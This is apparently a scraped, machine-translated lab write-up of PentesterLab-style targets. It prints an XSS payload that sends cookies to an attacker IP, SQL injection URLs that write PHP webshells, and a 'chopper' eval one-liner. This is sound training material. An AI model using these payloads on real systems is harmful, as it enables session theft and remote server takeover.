Web attack target drone problem solving process

Others 2022-04-22 00:24:34 views: 0

Please refer to the sql injection target machine attack process

https://pentesterlab.com/exercises/from_sqli_to_shell/course

http://www.sohu.com/a/126855490_472906

Please refer to the attack process of xss target drone

https://pentesterlab.com/exercises/xss_and_mysql_file/course

experiment one

 

 

 

 

Connect it with a kitchen knife

 

 

Experiment 2

 

Open the web page on the machine:

 

Test whether there is an xss vulnerability.

It is found that there is a pop-up box after submitting:

 

further structure the content

<script>document.write('<img src="http://192.168.179.142/?'+document.cookie+' "/>');</script> 
At the same time, open port 80 with nc on the 192.168.179.142 machine .

 Log in to the admin account on the original machine, the password is p4ssw0rd

 

Get cookie information.

Copy the cookie and open the page where the comment is located on the 142 machine. And modify the value of the cookie to the value just copied.

Refresh the next page and find that you have logged into the page as admin.

After entering the management interface, it is found that there is a sql injection vulnerability in the blog editing interface.

 

The passwd file can be read, but the shadow file cannot be read. Let's try if we can create a file.

On the edit page, I found that there is an error message in the /var/www/classes directory,

 

When viewing the source code, I found that there is a css directory

After trying it out, the /var/www/css directory is writable.

So construct the statement:

http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22

then open

http://192.168.179.130/css/s.php

show:

It means that the s.php file is successfully written to the /var/www/css directory, and the following will

<?php system($_GET['c']); ?>

Write in z.php and construct the url as:

http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22

Access z.php and use uname -a to get system information. Commands can be executed remotely.

Write a sentence Trojan horse below to construct the url:

http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22

Knife link:

 

Guess you like

Origin http://43.154.161.224:23101/article/api/json?id=324696145&siteId=291194637
Recommended
Ranking
[Algorithm] greedy _ program scheduling issues
Spring 控制反转(IOC)
Data structure-6.6 figure
Indicates that the class or member method has abstract properties
Huawei v5 server installed Linux operating system
Postgresql source code analysis - creating ordinary tables
Chapter 10 Evaluation Classification Results
Cloud service Ubuntu 20.04 version uses Nginx to deploy static web pages
Java Exercise 17.1
Solve the problem that git cannot automatically push submission in IDEA Push failed: Failed with error: Could not read from remote repository.
Daily
More
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)

Code World

© 2018 codetd.com